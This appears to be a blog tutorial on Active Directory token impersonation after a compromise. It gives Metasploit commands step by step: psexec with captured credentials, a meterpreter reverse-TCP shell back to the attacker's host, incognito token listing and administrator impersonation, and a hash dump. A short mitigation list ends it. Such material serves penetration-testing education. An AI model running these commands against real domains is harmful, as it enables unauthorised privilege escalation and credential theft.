Token Impersonation: AD Post Compromise Attack

Aditya Jha
3 min readJul 16, 2023

Overview

What are tokens?

  • Temporary keys that allow you access to a system/network without having provide credentials each time you access a file. Think cookies for computers.

Two types:

  • Delegate- Created for logging into a machine or using Remote Desktop.
  • Impersonate- “non-interactive” such as attaching a network drive or a domain logon script.

Steps:

Pop a shell and load incognito

Impersonate our domain user

Attempt to dump hashes as non-Domain Admin

ALRIGHT, BUT WHAT IF A DOMAIN ADMIN TOKEN WAS AVAILABLE?

Identify Domain Administrator

Impersonate our Domain Administrator

Attempt to dump hashes as Domain Admin…

WIN!

Token Impersonation with Incognito

So to perform this attack, firstly we have to start up the Metasploit.

Command: msfconsole

Now we will use psexec in metasploit.

Command: use exploit/windows/smb/psexec

Now we will set options according to our attack.

set rhosts <target IP>

set smbdomain <domain>

set smbpass <password>

set smbuser <user>

Now we will type “show targets”

and set it to Native upload by typing “set target 2”.

Now we will check the targets and then we will set the payload.

Command: set payload windows/x64/meterpreter/reverse_tcp

Now we will set lhost,

Command: set lhost eth0

Now we will type “run” and hit enter and now we have got the meterpreter shell.

Now we will load Incognito.

Command: load incognito

Now by typing “help” we can use these commands:

Now we will list tokens of user:

Command: list_tokens -u

Here we can see the administrator, so now we will impersonate the token of administrator.

Command: impersonate_token marvel\\administrator

Now we will type “shell” and hit enter then we will get a shell of that machine and we are administrator now.

But here is a problem. If you will exit out from the shell and execute the command hashdump then it will give an error. So, to solve this error, we will execute a command that will take us back to the initial step from where we entered the machine.

Command: rev2self

Mitigation Strategies

  • Limit user/group token creation permissions.
  • Account tiering
  • Local admin restriction

If you liked this writeup then you can connect with me on Linked_in or Instagram.

--

--